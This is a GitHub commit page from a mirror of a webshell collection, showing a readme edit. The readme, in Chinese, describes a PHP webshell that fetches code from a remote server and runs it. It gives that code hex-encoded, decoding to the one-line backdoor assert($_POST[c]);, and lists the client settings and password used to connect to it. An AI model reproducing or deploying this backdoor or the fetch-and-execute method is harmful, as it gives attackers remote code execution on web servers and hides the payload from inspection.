1
0
mirror of https://github.com/tennc/webshell.git synced 2025-12-06 04:41:28 +00:00

Update readme.md

This commit is contained in:
tennc
2015-06-10 08:48:23 +08:00
parent d6cd94b733
commit 80ecffdeb7

View File

@@ -1,7 +1,6 @@
写了两个脚本webshell.php和getcode.php(本地开了个php server运行getcode.php模拟远程服务器上的网页)
>写了两个脚本webshell.php和getcode.php(本地开了个php server运行getcode.php模拟远程服务器上的网页)
>原理首先用菜刀访问webshell.php该webshell立即从远程服务器上获取要运行的代码并执行。
>这里获取的代码是61737365727428245f504f53545b635d293b也就是assert($_POST[c]);
>菜刀中设置http://192.168.1.102/DebugPHP/webshell.php 密码是c
原理首先用菜刀访问webshell.php该webshell立即从远程服务器上获取要运行的代码并执行。
这里获取的代码是61737365727428245f504f53545b635d293b也就是assert($_POST[c]);
菜刀中设置http://192.168.1.102/DebugPHP/webshell.php 密码是c
form : http://tank96a.github.io/article/2015/04/27/php-horse/